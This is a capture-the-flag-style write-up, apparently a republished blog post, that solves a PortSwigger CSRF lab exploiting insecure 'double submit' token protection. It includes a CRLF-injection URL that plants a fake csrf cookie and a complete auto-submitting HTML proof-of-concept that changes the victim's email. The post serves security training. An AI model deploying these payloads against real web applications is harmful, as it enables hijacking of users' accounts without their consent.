CSRF Where Token is duplicated in Cookie | 2023
2023-2-6 15:26:24 Author: infosecwriteups.com(查看原文) 阅读量:22 收藏

Portswigger Cross-Site Request Forgery Lab Simple Solution | Karthikeyan Nagaraj

  • Cross-Site Request Forgery (CSRF) is a type of security vulnerability that affects web applications.
  • It occurs when an attacker tricks a user’s browser into sending a malicious request to a web application on behalf of the user, often without the user’s knowledge or consent.
  • The attacker takes advantage of the trust that a web application has in a user’s browser, exploiting the fact that the browser automatically includes authentication credentials (such as cookies) with each request.
  • This can allow an attacker to perform actions such as changing a password, transferring funds, or accessing sensitive information.
  • For example, if a user is logged into their online banking account and visits a malicious website, the attacker could use CSRF to transfer money from the user’s account without their knowledge.

Lab Description:

  • This lab’s email change functionality is vulnerable to CSRF. It attempts to use the insecure “double submit” CSRF prevention technique.
  • To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer’s email address.
  • You can log in to your own account using the following credentials: wiener:peter

Analysis:

  1. We know that the Email change Functionality is vulnerable to CSRF, So Let’s capture the Request

2. Send the Request to the Repeater

3. Perform a search, send the resulting request to Burp Repeater, and observe that the search term gets reflected in the Set-Cookie header

4. Since the search function has no CSRF protection, you can use this to inject cookies into the victim user’s browser.

5. Create a URL that uses this vulnerability to inject a fake csrf cookie into the victim's browser:

/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None

6. Generate POC for the Current request

7. Modify the poc and add the below script into the HTML code

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="abc&#64;gmail&#46;com" />
<input type="hidden" name="csrf" value="abc" />
<input type="submit" value="Submit request" />
</form>
<img src="https://YOUR-LAB-ID.web-security-academy.net/?search=abc%0d%0aSet-Cookie:%20csrf=abc%3b%20SameSite=None" onerror="document.forms[0].submit();"/>
</body>
</html>

8. Paste the code and Deliver it to the Victim

Feel Free to Ask Queries via LinkedIn and to Buy me a Cofee : )

Thank you for Reading!!

Happy Hunting ~

Author : karthikeyan Nagaraj ~ Cyberw1ng

文章来源: https://infosecwriteups.com/csrf-where-token-is-duplicated-in-cookie-2023-387556f4adb2?source=rss----7b722bfd1b8d--bug_bounty
如有侵权请联系:admin#unsafe.sh